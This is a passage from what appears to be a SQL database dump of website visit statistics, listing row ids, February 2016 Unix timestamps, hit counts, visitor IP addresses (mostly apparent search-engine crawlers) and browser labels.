8.97','chrome'),(6329,1456132383,1,1,0,0,'40.77.167.55','other'),(6330,1456132818,1,1,0,0,'217.69.133.228','other'),(6331,1456133165,1,1,0,0,'217.69.133.72','other'),(6332,1456133355,1,1,0,0,'66.249.81.208','other'),(6333,1456133481,1,1,0,0,'66.249.93.86','firefox'),(6334,1456133549,1,1,0,0,'217.69.133.11','other'),(6335,1456133554,1,1,0,0,'8.29.198.26','other'),(6336,1456133997,1,0,1,0,'68.180.229.232',''),(6337,1456134170,1,1,0,0,'66.249.92.99','other'),(6338,1456134789,1,1,0,0,'62.210.215.100','chrome'),(6339,1456134791,1,1,0,0,'67.196.50.4','chrome'),(6340,1456135076,1,1,0,0,'213.5.193.73','chrome'),(6341,1456135222,1,1,0,0,'217.69.136.208','other'),(6342,1456135565,2,2,0,0,'130.193.51.85','other'),(6343,1456135569,1,1,0,0,'5.255.253.94','other'),(6344,1456135575,1,1,0,0,'141.8.132.74','other'),(6345,1456135578,1,1,0,0,'5.255.253.51','other'),(6346,1456135582,1,1,0,0,'5.255.253.103','other'),(6347,1456135587,1,1,0,0,'5.255.253.30','other'),(6348,1456135591,1,1,0,0,'141.8.142.10','other'),(6349,1456135595,1,1,0,0,'141.8.142.55','other'),(6350,1456135599,1,1,0,0,'141.8.132.79','other'),(6351,1456135604,1,1,0,0,'5.255.253.10','other'),(6352,1456135608,1,1,0,0,'130.193.51.81','other'),(6353,1456135612,1,1,0,0,'141.8.184.11','other'),(6354,1456135616,1,1,0,0,'141.8.184.31','other'),(6355,1456135625,1,1,0,0,'93.158.152.26','other'),(6356,1456135629,1,1,0,0,'178.154.149.11','other'),(6357,1456135633,1,1,0,0,'5.255.253.53','other'),(6358,1456135815,1,1,0,0,'91.196.178.167','firefox'),(6359,1456135851,1,1,0,0,'91.196.179.69','chrome'),(6360,1456136282,1,1,0,0,'46.201.240.112','firefox'),(6361,1456136708,2,0,2,0,'68.180.229.232',''),(6362,1456136760,1,1,0,0,'46.174.127.24','firefox'),(6363,1456136793,1,1,0,0,'217.69.133.228','other'),(6364,1456136928,1,1,0,0,'66.249.81.211','other'),(6365,1456136955,1,1,0,0,'91.196.178.72','firefox'),(6366,1456137468,2,2,0,0,'141.8.142.8','other'),(6367,1456137473,1,1,0,0,'141.8.142.60','other'),(6368,1456137477,2,2,0,0,'5.255.253.103','other'),(6369,1456137481,1,1,0,0,'91.196.178.36','chrome'),(6370,1456137645,1,1,0,0,'91.196.178.68','chrome'),(6371,1456137882,3,3,0,0,'5.255.253.10','other'),(6372,1456137886,2,2,0,0,'130.193.51.102','other'),(6373,1456137934,1,1,0,0,'5.255.253.62','other'),(6374,1456137939,3,3,0,0,'141.8.184.22','other'),(6375,1456137950,3,3,0,0,'93.158.152.65','other'),(6376,1456137959,2,2,0,0,'178.154.189.12','other'),(6377,1456137964,2,2,0,0,'93.158.152.26','other'),(6378,1456137968,1,1,0,0,'141.8.184.31','other'),(6379,1456137984,1,1,0,0,'93.158.152.9','other'),(6380,1456137988,1,1,0,0,'141.8.132.44','other'),(6381,1456138003,2,2,0,0,'5.255.253.17','other'),(6382,1456138011,3,3,0,0,'141.8.184.6','other'),(6383,1456138070,1,1,0,0,'141.8.184.18','other'),(6384,1456138414,1,1,0,0,'109.227.97.205','chrome'),(6385,1456138496,1,1,0,0,'107.178.194.125','chrome'),(6386,1456138548,1,1,0,0,'91.196.177.134','chrome'),(6387,1456138553,3,0,3,0,'68.180.229.232',''),(6388,1456138581,1,1,0,0,'5.255.253.9','other'),(6389,1456138584,2,2,0,0,'130.193.51.81','other'),(6390,1456138588,1,1,0,0,'141.8.132.97','other'),(6391,1456138592,2,2,0,0,'5.255.253.51','other'),(6392,1456138597,1,1,0,0,'141.8.183.14','other'),(6393,1456138613,2,2,0,0,'130.193.51.55','other'),(6394,1456138617,2,2,0,0,'141.8.132.66','other'),(6395,1456138621,2,2,0,0,'5.255.253.89','other'),(6396,1456138625,1,1,0,0,'130.193.51.22','other'),(6397,1456138631,1,1,0,0,'5.255.253.53','other'),(6398,1456138634,1,1,0,0,'141.8.132.99','other'),(6399,1456138638,1,1,0,0,'5.255.253.100','other'),(6400,1456138650,2,2,0,0,'141.8.184.11','other'),(6401,1456138654,2,2,0,0,'141.8.142.10','other'),(6402,1456138658,1,1,0,0,'130.193.51.45','other'),(6403,1456138675,1,1,0,0,'5.255.253.94','other'),(6404,1456138679,1,1,0,0,'141.8.142.60','other'),(6405,1456138683,1,1,0,0,'141.8.132.74','other'),(6406,1456138687,1,1,0,0,'5.255.253.103','other'),(6407,1456138715,3,3,0,0,'217.198.1.70','firefox'),(6408,1456138716,1,1,0,0,'141.8.132.48','other'),(6409,1456138888,2,2,0,0,'5.255.253.10','other'),(6410,1456139096,1,1,0,0,'217.69.133.227','other'),(6411,1456139281,1,1,0,0,'40.77.167.55','other'),(6412,1456139391,1,1,0,0,'93.158.152.26','other'),(6413,1456139396,1,1,0,0,'93.158.152.9','other'),(6414,1456139666,1,1,0,0,'180.76.15.25','other'),(6415,1456140483,1,1,0,0,'66.249.81.211','other'),(6416,1456140858,1,1,0,0,'51.255.65.60','other'),(6417,1456141467,1,1,0,0,'40.77.167.55','other'),(6418,1456141651,1,1,0,0,'207.46.13.127','other'),(6419,1456142542,1,1,0,0,'207.46.13.32','other'),(6420,1456142945,1,1,0,0,'217.69.133.9','other'),(6421,1456143200,1,1,0,0,'217.69.133.224','other'),(6422,1456143242,1,1,0,0,'94.179.14.136','msie'),(6423,1456143257,1,1,0,0,'141.8.132.109','other'),(6424,1456143312,1,1,0,0,'91.196.178.68','chrome'),(6425,1456143332,1,1,0,0,'178.95.247.202','chrome'),(6426,1456143789,1,1,0,0,'91.196.178.70','chrome'),(6427,1456143804,2,2,0,0,'91.196.177.44','chrome'),(6428,1456144096,1,1,0,0,'66.249.81.211','other'),(6429,1456144105,1,0,1,0,'66.249.66.166',''),(6430,1456144191,1,1,0,0,'51.255.65.45','other'),(6431,1456144393,1,1,0,0,'141.8.184.18','other'),(6432,1456144394,1,1,0,0,'178.154.149.11','other'),(6433,1456144396,1,1,0,0,'8.29.198.26','other'),(6434,1456144491,1,0,1,0,'68.180.229.232',''),(6435,1456145010,1,1,0,0,'66.249.92.103','other'),(6436,1456145080,1,0,1,0,'66.249.78.158',''),(6437,1456145136,1,1,0,0,'37.55.190.212','chrome'),(6438,1456145555,1,1,0,0,'141.8.184.22','other'),(6439,1456145557,1,1,0,0,'5.255.253.55','other'),(6440,1456145648,1,1,0,0,'207.46.13.127','other'),(6441,1456145887,1,1,0,0,'130.193.51.50','other'),(6442,1456145894,1,1,0,0,'62.210.215.100','chrome'),(6443,1456145911,1,1,0,0,'93.158.152.65','other'),(6444,1456145912,1,1,0,0,'130.193.51.91','other'),(6445,1456146423,1,1,0,0,'51.255.65.78','other'),(6446,1456146554,1,1,0,0,'130.193.50.31','other'),(6447,1456146728,1,1,0,0,'40.77.167.55','other'),(6448,1456147250,1,1,0,0,'37.53.71.66','chrome'),(6449,1456147685,1,1,0,0,'66.249.81.205','other'),(6450,1456147831,1,1,0,0,'91.196.178.70','chrome'),(6451,1456147832,1,0,1,0,'66.249.66.129',''),(6452,1456148156,1,1,0,0,'217.69.133.18','other'),(6453,1456148233,1,1,0,0,'82.207.49.94','chrome'),(6454,1456148240,1,1,0,0,'37.55.230.235','chrome'),(6455,1456148371,1,1,0,0,'91.196.178.163','chrome'),(6456,1456148568,1,1,0,0,'91.196.178.130','firefox'),(6457,1456149023,1,1,0,0,'91.196.176.13','chrome'),(6458,1456149038,1,1,0,0,'95.134.216.22','chrome'),(6459,1456149098,1,1,0,0,'5.255.253.17','other'),(6460,1456149102,1,1,0,0,'141.8.132.76','other'),(6461,1456149275,1,1,0,0,'82.193.127.15','other'),(6462,1456149396,1,1,0,0,'85.115.62.180','other'),(6463,1456149532,1,0,1,0,'66.249.78.30',''),(6464,1456149547,1,1,0,0,'217.69.133.10','other'),(6465,1456149579,1,0,1,0,'66.249.78.151',''),(6466,1456149882,4,4,0,0,'141.8.184.18','other'),(6467,1456149890,1,1,0,0,'93.158.152.9','other'),(6468,1456149898,1,1,0,0,'95.132.82.100','chrome'),(6469,1456150063,1,1,0,0,'217.69.133.68','other'),(6470,1456150340,53,53,0,0,'93.63.88.184','other'),(6471,1456150709,1,1,0,0,'95.133.238.223','chrome'),(6472,1456150756,2,0,2,0,'68.180.229.232',''),(6473,1456150911,2,2,0,0,'141.8.184.18','other'),(6474,1456151099,2,2,0,0,'207.46.13.32','other'),(6475,1456151132,1,1,0,0,'157.55.39.100','other'),(6476,1456151251,1,0,1,0,'66.249.78.144',''),(6477,1456151326,1,1,0,0,'66.249.81.208','other'),(6478,1456151516,1,1,0,0,'130.193.51.22','other'),(6479,1456151517,1,1,0,0,'141.8.132.2','other'),(6480,1456151518,1,1,0,0,'5.255.253.55','other'),(6482,1456151519,1,1,0,0,'141.8.132.44','other'),(6483,1456151520,1,1,0,0,'130.193.50.22','other'),(6484,1456151563,1,1,0,0,'37.53.89.22','chrome'),(6485,1456151876,1,1,0,0,'141.8.142.8','other'),(6486,1456151877,1,1,0,0,'141.8.183.14','other'),(6487,1456151878,1,1,0,0,'130.193.37.21','other'),(6489,1456151879,1,1,0,0,'5.255.253.10','other'),(6490,1456151880,1,1,0,0,'141.8.142.10','other'),(6491,1456151964,1,1,0,0,'180.76.15.149','other'),(6492,1456151993,1,1,0,0,'180.76.15.138','other'),(6493,1456152006,1,1,0,0,'207.46.13.127','other'),(6494,1456152422,1,1,0,0,'40.77.167.55','other'),(6495,1456152750,1,1,0,0,'157.55.39.100','other'),(6496,1456153288,1,1,0,0,'141.8.132.79','other'),(6498,1456153289,1,1,0,0,'5.255.253.53','other'),(6499,1456153290,1,1,0,0,'130.193.51.45','other'),(6500,1456153376,1,1,0,0,'5.255.253.55','other'),(6502,1456153377,1,1,0,0,'141.8.142.8','other'),(6503,1456153378,1,1,0,0,'141.8.183.14','other'),(6504,1456153541,156,156,0,0,'144.76.8.132','other'),(6505,1456153592,2,0,2,0,'68.180.229.232',''),(6506,1456154517,1,1,0,0,'91.196.194.166','firefox'),(6507,1456154525,1,1,0,0,'217.69.133.9','other'),(6508,1456154551,1,1,0,0,'91.196.178.69','chrome'),(6509,1456154555,68,68,0,0,'46.4.32.75','other'),(6510,1456154945,1,1,0,0,'91.196.178.69','firefox'),(6511,1456154981,1,1,0,0,'66.249.81.205','other'),(6512,1456155223,1,1,0,0,'66.249.92.103','other'),(6513,1456155263,1,1,0,0,'217.69.133.11','other'),(6514,1456155284,1,1,0,0,'8.29.198.25','other'),(6515,1456155531,1,0,1,0,'68.180.229.232',''),(6516,1456155552,1,1,0,0,'180.76.15.163','other'),(6517,1456155680,1,1,0,0,'91.196.178.40','chrome'),(6518,1456156518,5,0,5,0,'68.180.229.232',''),(6519,1456156521,1,1,0,0,'195.46.32.225','chrome'),(6520,1456156842,1,1,0,0,'91.196.178.97','chrome'),(6521,1456157224,1,1,0,0,'51.255.65.52','other'),(6522,1456157311,1,1,0,0,'78.111.190.112','firefox'),(6523,1456157562,1,1,0,0,'180.76.15.5','other'),(6524,1456157961,1,0,1,0,'66.249.78.151',''),(6525,1456158018,1,1,0,0,'62.210.215.100','chrome'),(6526,1456158019,1,1,0,0,'141.8.183.14','other'),(6527,1456158020,1,1,0,0,'178.154.149.11','other'),(6528,1456158383,3,0,3,0,'68.180.229.232',''),(6529,1456158552,1,1,0,0,'66.249.81.208','other'),(6531,1456158848,1,1,0,0,'141.0.15.53','other'),(6532,1456159059,1,1,0,0,'37.52.89.163','chrome'),(6533,1456159311,2,2,0,0,'141.8.184.18','other'),(6534,1456159340,1,1,0,0,'178.154.149.11','other'),(6535,1456159358,1,0,1,0,'66.249.78.158',''),(6536,1456159592,1,1,0,0,'91.196.178.131','chrome'),(6537,1456159695,1,1,0,0,'40.77.167.55','other'),(6538,1456159717,1,1,0,0,'207.46.13.127','other'),(6539,1456159724,1,1,0,0,'176.9.131.69','other'),(6540,1456159994,1,1,0,0,'217.69.133.5','other'),(6541,1456160009,1,1,0,0,'51.255.65.13','other'),(6542,1456160052,3,3,0,0,'217.25.199.117','firefox'),(6543,1456160132,1,1,0,0,'217.69.133.220','other'),(6544,1456160253,1,1,0,0,'91.196.178.68','chrome'),(6545,1456160792,4,4,0,0,'141.8.184.18','other'),(6546,1456160794,1,1,0,0,'178.154.149.11','other'),(6547,1456161130,1,1,0,0,'217.69.133.217','other'),(6548,1456161145,1,1,0,0,'95.133.238.223','chrome'),(6549,1456161276,1,1,0,0,'51.255.65.52','other'),(6550,1456161670,1,1,0,0,'178.154.189.204','other'),(6551,1456161672,1,1,0,0,'37.9.122.203','other'),(6552,1456161731,3,0,3,0,'68.180.229.232',''),(6553,1456162030,1,0,1,0,'66.249.78.158',''),(6554,1456162040,1,1,0,0,'213.180.206.205','other'),(6555,1456162197,1,1,0,0,'66.249.81.205','other'),(6556,1456162216,1,1,0,0,'207.46.13.32','other'),(6557,1456162922,2,2,0,0,'40.77.167.55','other'),(6558,1456163910,1,1,0,0,'94.179.120.224','firefox'),(6559,1456163984,2,0,2,0,'68.180.229.232',''),(6560,1456164197,1,1,0,0,'80.91.162.99','other'),(6561,1456164371,1,1,0,0,'51.255.65.31','other'),(6562,1456164770,5,5,0,0,'178.151.143.163','other'),(6563,1456164793,1,1,0,0,'217.69.136.209','other'),(6564,1456164999,1,1,0,0,'217.69.133.9','other'),(6565,1456165157,1,1,0,0,'37.54.16.202','firefox'),(6566,1456165194,2,2,0,0,'37.54.16.202','chrome'),(6567,1456165213,1,1,0,0,'37.229.220.208','other'),(6568,1456165279,1,1,0,0,'104.209.188.207','other'),(6569,1456165298,1,1,0,0,'23.101.61.176','other'),(6570,1456165465,1,1,0,0,'37.52.19.41','chrome'),(6571,1456165650,1,0,1,0,'66.249.78.151',''),(6572,1456165779,1,0,1,0,'68.180.229.232',''),(6573,1456165857,1,1,0,0,'217.69.133.250','other'),(6574,1456166071,1,0,1,0,'66.249.78.144',''),(6575,1456166133,1,1,0,0,'66.249.92.103','other'),(6576,1456166562,1,1,0,0,'8.29.198.25','other'),(6577,1456166745,2,2,0,0,'141.8.183.14','other'),(6579,1456166746,5,5,0,0,'141.8.184.18','other'),(6580,1456166795,1,1,0,0,'37.9.122.203','other'),(6581,1456166796,1,1,0,0,'178.154.189.204','other'),(6582,1456168533,1,1,0,0,'217.69.133.15','other'),(6583,1456168547,1,1,0,0,'217.69.133.9','other'),(6584,1456168622,5,5,0,0,'80.91.162.99','other'),(6585,1456168768,1,0,1,0,'66.249.78.158',''),(6586,1456168974,1,0,1,0,'68.180.229.232',''),(6587,1456168976,1,1,0,0,'141.8.142.10','other'),(6588,1456169280,1,1,0,0,'37.229.220.208','other'),(6589,1456169604,1,1,0,0,'91.196.178.167','firefox'),(6590,1456169781,1,1,0,0,'62.210.215.100','chrome'),(6591,1456169943,1,1,0,0,'91.196.178.99','chrome'),(6592,1456170009,1,1,0,0,'217.69.133.226','other'),(6593,1456170048,4,4,0,0,'136.243.172.46','chrome'),(6594,1456170136,2,2,0,0,'178.154.189.204','other'),(6595,1456170454,2,2,0,0,'51.255.162.165','other'),(6596,1456170533,1,0,1,0,'66.249.66.162',''),(6597,1456170623,1,1,0,0,'37.54.16.202','firefox'),(6598,1456170751,1,1,0,0,'217.69.133.72','other'),(6599,1456170835,1,1,0,0,'141.8.132.76','other'),(6600,1456171023,1,1,0,0,'40.77.167.55','other'),(6601,1456171039,1,1,0,0,'141.0.15.54','other'),(6602,1456171345,1,0,1,0,'68.180.229.232',''),(6603,1456172109,1,1,0,0,'37.54.16.202','firefox'),(6604,1456172463,1,0,1,0,'66.249.78.144',''),(6605,1456172928,3,3,0,0,'5.255.253.10','other'),(6606,1456172932,2,2,0,0,'5.255.253.55','other'),(6607,1456173066,2,2,0,0,'141.8.132.99','other'),(6608,1456173083,2,2,0,0,'5.255.253.110','other'),(6609,1456173087,4,4,0,0,'141.8.183.14','other'),(6610,1456173092,4,4,0,0,'130.193.51.81','other'),(6611,1456173096,2,2,0,0,'141.8.142.8','other'),(6612,1456173100,3,3,0,0,'141.8.132.2','other'),(6613,1456173105,1,1,0,0,'141.8.142.88','other'),(6614,1456173109,1,1,0,0,'178.154.149.11','other'),(6615,1456173113,3,3,0,0,'130.193.51.45','other'),(6616,1456173118,5,5,0,0,'130.193.51.102','other'),(6617,1456173126,4,4,0,0,'93.158.152.26','other'),(6618,1456173138,4,4,0,0,'130.193.51.43','other'),(6619,1456173160,2,2,0,0,'141.8.132.97','other'),(6620,1456173164,3,3,0,0,'130.193.37.27','other'),(6621,1456173168,2,2,0,0,'93.158.152.9','other'),(6622,1456173181,1,1,0,0,'5.255.253.62','other'),(6623,1456173194,3,3,0,0,'141.8.132.76','other'),(6624,1456173299,3,3,0,0,'5.255.253.9','other'),(6625,1456173303,4,4,0,0,'5.255.253.30','other'),(6626,1456173312,1,1,0,0,'141.8.132.74','other'),(6627,1456173316,3,3,0,0,'130.193.37.21','other'),(6628,1456173320,4,4,0,0,'141.8.184.11','other'),(6629,1456173526,7,7,0,0,'141.8.132.79','other'),(6630,1456173661,2,2,0,0,'5.255.253.100','other'),(6631,1456173685,1,1,0,0,'93.158.152.65','other'),(6632,1456173687,2,2,0,0,'141.8.184.22','other'),(6633,1456173692,2,2,0,0,'130.193.51.85','other'),(6634,1456173696,4,4,0,0,'141.8.184.18','other'),(6635,1456173727,1,1,0,0,'130.193.51.7','other'),(6636,1456173747,1,1,0,0,'130.193.50.31','other'),(6637,1456173762,2,2,0,0,'5.255.253.53','other'),(6638,1456173809,1,1,0,0,'217.69.136.209','other'),(6639,1456173925,1,1,0,0,'217.69.143.66','other'),(6640,1456173935,4,4,0,0,'5.255.253.10','other'),(6641,1456173938,1,1,0,0,'5.255.253.103','other'),(6642,1456174127,5,5,0,0,'141.8.183.14','other'),(6644,1456174128,3,3,0,0,'130.193.51.45','other'),(6645,1456174129,2,2,0,0,'130.193.51.43','other'),(6646,1456174130,5,5,0,0,'141.8.142.10','other'),(6647,1456174131,3,3,0,0,'130.193.51.81','other'),(6648,1456174132,4,4,0,0,'141.8.132.97','other'),(6649,1456174140,4,4,0,0,'5.255.253.110','other'),(6650,1456174143,4,4,0,0,'130.193.37.27','other'),(6652,1456174184,3,3,0,0,'130.193.51.102','other'),(6653,1456174190,9,9,0,0,'5.255.253.55','other'),(6654,1456174218,5,5,0,0,'141.8.142.41','other'),(6655,1456174220,1,1,0,0,'130.193.51.109','other'),(6656,1456174221,2,2,0,0,'130.193.37.21','other'),(6657,1456174239,5,5,0,0,'141.8.132.2','other'),(6658,1456174240,6,6,0,0,'141.8.184.11','other'),(6659,1456174243,2,2,0,0,'5.255.253.30','other'),(6660,1456174244,3,3,0,0,'141.8.132.76','other'),(6661,1456174245,1,1,0,0,'141.8.132.48','other'),(6662,1456174248,4,4,0,0,'141.8.132.99','other'),(6663,1456174264,2,2,0,0,'141.8.142.88','other'),(6664,1456174652,1,0,1,0,'66.249.78.151',''),(6665,1456174752,4,4,0,0,'5.255.253.100','other'),(6666,1456174755,2,2,0,0,'178.154.189.6','other'),(6667,1456174947,4,4,0,0,'130.193.51.85','other'),(6668,1456174948,6,6,0,0,'5.255.253.53','other'),(6669,1456174953,3,3,0,0,'141.8.184.18','other'),(6670,1456174956,1,1,0,0,'130.193.50.22','other'),(6671,1456174957,1,1,0,0,'5.255.253.9','other'),(6672,1456174984,4,4,0,0,'141.8.132.79','other'),(6673,1456175003,3,3,0,0,'5.255.253.10','other'),(6674,1456175006,1,1,0,0,'130.193.51.50','other'),(6675,1456175023,4,4,0,0,'141.8.142.8','other'),(6676,1456175024,7,7,0,0,'178.154.149.11','other'),(6677,1456175035,4,4,0,0,'141.8.183.14','other'),(6678,1456175036,1,1,0,0,'93.158.152.81','other'),(6679,1456175037,4,4,0,0,'130.193.51.45','other'),(6680,1456175038,3,3,0,0,'141.8.142.10','other'),(6681,1456175039,2,2,0,0,'141.8.184.22','other'),(6682,1456175046,1,1,0,0,'5.255.253.17','other'),(6683,1456175049,4,4,0,0,'130.193.51.81','other'),(6684,1456175055,3,3,0,0,'93.158.152.9','other'),(6685,1456175056,1,1,0,0,'130.193.51.7','other'),(6686,1456175060,3,3,0,0,'5.255.253.110','other'),(6687,1456175065,1,1,0,0,'5.255.253.89','other'),(6688,1456175067,4,4,0,0,'130.193.51.43','other'),(6689,1456175088,5,5,0,0,'80.91.162.99','other'),(6690,1456175136,2,2,0,0,'5.255.253.55','other'),(6691,1456175164,2,2,0,0,'5.255.253.30','other'),(6692,1456175165,2,2,0,0,'141.8.142.41','other'),(6693,1456175200,2,2,0,0,'93.158.152.26','other'),(6694,1456175202,1,1,0,0,'5.255.253.103','other'),(6695,1456175210,2,2,0,0,'130.193.37.27','other'),(6696,1456175214,2,2,0,0,'141.8.184.11','other'),(6697,1456175240,2,2,0,0,'141.8.142.88','other'),(6698,1456175243,1,1,0,0,'141.8.142.82','other'),(6699,1456175245,1,1,0,0,'141.8.132.2','other'),(6700,1456175583,1,1,0,0,'157.55.39.100','other'),(6701,1456175758,1,1,0,0,'130.193.37.21','other'),(6702,1456175766,1,1,0,0,'5.255.253.62','other'),(6703,1456175806,3,0,3,0,'68.180.229.232',''),(6704,1456175898,1,1,0,0,'91.196.178.167','chrome'),(6705,1456176063,2,2,0,0,'130.193.51.102','other'),(6706,1456176065,1,1,0,0,'178.154.149.11','other'),(6707,1456176069,1,1,0,0,'5.255.253.110','other'),(6708,1456176071,1,1,0,0,'141.8.142.8','other'),(6709,1456176072,1,1,0,0,'141.8.184.18','other'),(6710,1456176073,1,1,0,0,'5.255.253.100','other'),(6711,1456176075,1,1,0,0,'141.8.184.22','other'),(6712,1456176080,1,1,0,0,'130.193.51.43','other'),(6713,1456176082,1,1,0,0,'130.193.51.81','other'),(6715,1456176083,1,1,0,0,'141.8.132.76','other'),(6716,1456176086,1,1,0,0,'130.193.51.45','other'),(6717,1456176089,1,1,0,0,'141.8.132.97','other'),(6718,1456176090,1,1,0,0,'5.255.253.55','other'),(6719,1456176093,1,1,0,0,'93.158.152.9','other'),(6720,1456176094,1,1,0,0,'141.8.132.99','other'),(6721,1456176722,1,1,0,0,'66.249.92.103','other'),(6722,1456176817,3,0,3,0,'68.180.229.232',''),(6723,1456176902,1,1,0,0,'141.8.132.79','other'),(6724,1456177454,1,1,0,0,'130.193.37.27','other'),(6726,1456177471,1,1,0,0,'8.29.198.26','other'),(6727,1456177610,1,1,0,0,'157.55.39.176','other'),(6728,1456178166,1,0,1,0,'68.180.229.232',''),(6729,1456178183,1,1,0,0,'141.8.132.97','other'),(6730,1456178636,1,1,0,0,'51.255.65.82','other'),(6731,1456178753,1,1,0,0,'141.8.132.2','other'),(6732,1456179236,1,1,0,0,'217.69.136.208','other'),(6733,1456179237,1,1,0,0,'217.69.136.207','other'),(6734,1456179385,1,1,0,0,'141.8.142.88','other'),(6735,1456179386,3,3,0,0,'5.255.253.55','other'),(6736,1456179387,1,1,0,0,'180.76.15.28','other'),(6737,1456179468,1,1,0,0,'93.158.152.26','other'),(6738,1456179991,2,2,0,0,'141.8.142.8','other'),(6739,1456180035,2,2,0,0,'130.193.51.81','other'),(6740,1456180098,1,1,0,0,'5.255.253.110','other'),(6741,1456180099,1,1,0,0,'130.193.51.85','other'),(6742,1456180100,1,1,0,0,'178.154.149.11','other'),(6743,1456180101,1,1,0,0,'5.255.253.100','other'),(6745,1456180102,1,1,0,0,'130.193.51.102','other'),(6746,1456180103,1,1,0,0,'130.193.37.27','other'),(6747,1456180104,1,1,0,0,'5.255.253.62','other'),(6748,1456180105,1,1,0,0,'5.255.253.53','other'),(6749,1456180106,1,1,0,0,'141.8.132.2','other'),(6750,1456180109,1,1,0,0,'141.8.183.14','other'),(6751,1456180210,1,1,0,0,'66.249.81.208','other'),(6752,1456180229,3,3,0,0,'5.9.89.170','other'),(6753,1456180327,2,2,0,0,'207.46.13.127','other'),(6754,1456180565,1,1,0,0,'51.255.65.40','other'),(6755,1456180637,2,0,2,0,'68.180.229.232',''),(6756,1456180703,1,1,0,0,'62.210.215.100','chrome'),(6757,1456180831,1,1,0,0,'217.69.133.21','other'),(6758,1456181613,1,1,0,0,'217.69.133.252','other'),(6759,1456181755,1,0,1,0,'68.180.229.232',''),(6760,1456182139,1,1,0,0,'37.9.122.203','other'),(6761,1456182641,1,1,0,0,'217.69.133.220','other'),(6762,1456182684,155,155,0,0,'213.251.184.38','other'),(6763,1456182835,1,1,0,0,'5.255.253.55','other'),(6764,1456182892,1,1,0,0,'217.69.133.250','other'),(6765,1456183832,3,0,3,0,'68.180.229.232',''),(6766,1456183858,1,1,0,0,'217.69.133.217','other'),(6767,1456183900,1,1,0,0,'66.249.81.208','other'),(6768,1456183989,1,1,0,0,'157.55.39.100','other'),(6769,1456184085,1,0,1,0,'66.249.78.151',''),(6770,1456184544,1,1,0,0,'40.77.167.55','other'),(6771,1456185212,1,1,0,0,'217.69.133.59','other'),(6772,1456185435,1,1,0,0,'157.55.39.176','other'),(6773,1456185975,1,1,0,0,'207.46.13.127','other'),(6774,1456185976,1,0,1,0,'66.249.66.162',''),(6775,1456186284,1,1,0,0,'141.8.184.18','other'),(6776,1456186321,1,1,0,0,'217.69.136.210','other'),(6777,1456186340,1,1,0,0,'157.55.39.176','other'),(6778,1456186594,1,1,0,0,'217.69.133.18','other'),(6779,1456187270,1,1,0,0,'178.154.149.11','other'),(6780,1456187271,3,3,0,0,'141.8.184.18','other'),(6781,1456187273,2,2,0,0,'141.8.183.14','other'),(6782,1456187275,1,1,0,0,'5.255.253.53','other'),(6783,1456187278,1,1,0,0,'130.193.37.21','other'),(6784,1456187279,1,1,0,0,'93.158.152.9','other'),(6785,1456187329,2,2,0,0,'157.55.39.51','other'),(6786,1456187660,2,0,2,0,'68.180.229.232',''),(6787,1456187794,1,1,0,0,'101.226.166.199','chrome'),(6788,1456187804,1,1,0,0,'66.249.92.99','other'),(6789,1456188288,1,1,0,0,'8.29.198.25','other'),(6790,1456188881,1,1,0,0,'51.255.65.74','other'),(6791,1456189354,1,1,0,0,'217.69.133.15','other'),(6792,1456189498,1,1,0,0,'141.8.184.18','other'),(6793,1456190162,1,0,1,0,'66.249.66.162',''),(6794,1456190255,1,1,0,0,'180.76.15.31','other'),(6795,1456190383,1,1,0,0,'62.210.215.100','chrome'),(6796,1456190384,1,1,0,0,'217.69.133.2','other'),(6797,1456190727,5,5,0,0,'178.154.149.11','other'),(6798,1456190728,6,6,0,0,'141.8.183.14','other'),(6799,1456190729,7,7,0,0,'141.8.184.18','other'),(6800,1456190737,2,2,0,0,'130.193.51.102','other'),(6802,1456190741,1,1,0,0,'141.8.132.76','other'),(6804,1456190961,1,0,1,0,'68.180.229.232',''),(6805,1456190999,1,1,0,0,'130.193.51.43','other'),(6806,1456191005,2,0,2,0,'66.249.78.158',''),(6807,1456191888,1,0,1,0,'66.249.78.151',''),(6808,1456193698,2,2,0,0,'157.55.39.51','other'),(6809,1456193739,1,1,0,0,'5.255.253.94','other'),(6811,1456193740,1,1,0,0,'141.8.142.55','other'),(6813,1456193741,1,1,0,0,'141.8.184.31','other'),(6814,1456193742,1,1,0,0,'130.193.50.22','other'),(6815,1456193743,1,1,0,0,'5.255.253.17','other'),(6816,1456193764,1,1,0,0,'93.158.152.65','other'),(6817,1456193765,1,1,0,0,'141.8.132.66','other'),(6819,1456193766,1,1,0,0,'5.255.253.53','other'),(6820,1456193768,1,1,0,0,'141.8.132.99','other'),(6821,1456193769,1,1,0,0,'130.193.51.45','other'),(6823,1456193770,1,1,0,0,'141.8.132.2','other'),(6824,1456193771,1,1,0,0,'93.158.152.26','other'),(6825,1456193772,1,1,0,0,'141.8.184.11','other'),(6827,1456193773,1,1,0,0,'141.8.184.22','other'),(6828,1456193774,1,1,0,0,'130.193.51.102','other'),(6829,1456193775,1,1,0,0,'5.255.253.110','other'),(6831,1456193777,1,1,0,0,'141.8.132.76','other'),(6833,1456193778,1,1,0,0,'130.193.37.27','other'),(6834,1456193779,1,1,0,0,'130.193.51.85','other'),(6835,1456193780,1,1,0,0,'141.8.142.8','other'),(6836,1456194212,1,0,1,0,'66.249.78.158',''),(6837,1456194639,1,0,1,0,'68.180.229.232',''),(6838,1456195071,1,1,0,0,'217.69.133.15','other'),(6839,1456195254,1,1,0,0,'178.154.189.204','other'),(6840,1456197319,1,1,0,0,'141.8.183.14','other'),(6841,1456198187,1,0,1,0,'66.249.78.151',''),(6842,1456198453,1,1,0,0,'217.69.133.192','other'),(6843,1456198840,1,1,0,0,'157.55.39.100','other'),(6844,1456199029,1,1,0,0,'217.69.133.9','other'),(6845,1456199090,1,1,0,0,'66.249.92.103','other'),(6846,1456199121,1,1,0,0,'8.29.198.25','other'),(6847,1456199228,1,0,1,0,'68.180.229.232',''),(6848,1456199244,1,1,0,0,'157.55.39.51','other'),(6849,1456200301,2,0,2,0,'66.249.66.162',''),(6850,1456200551,1,1,0,0,'51.255.65.4','other'),(6851,1456200859,1,0,1,0,'68.180.229.232',''),(6852,1456201602,1,1,0,0,'217.69.133.193','other'),(6853,1456202277,1,1,0,0,'62.210.215.100','chrome'),(6854,1456202453,1,1,0,0,'217.69.133.190','other'),(6855,1456202479,1,1,0,0,'130.193.51.22','other'),(6856,1456202481,1,1,0,0,'141.8.132.48','other'),(6859,1456202482,1,1,0,0,'93.158.152.81','other'),(6860,1456202483,1,1,0,0,'130.193.51.7','other'),(6861,1456202484,1,1,0,0,'5.255.253.79','other'),(6862,1456202701,1,0,1,0,'66.249.78.144',''),(6863,1456202996,1,1,0,0,'157.55.39.100','other'),(6864,1456203396,1,1,0,0,'207.46.13.127','other'),(6865,1456203431,2,0,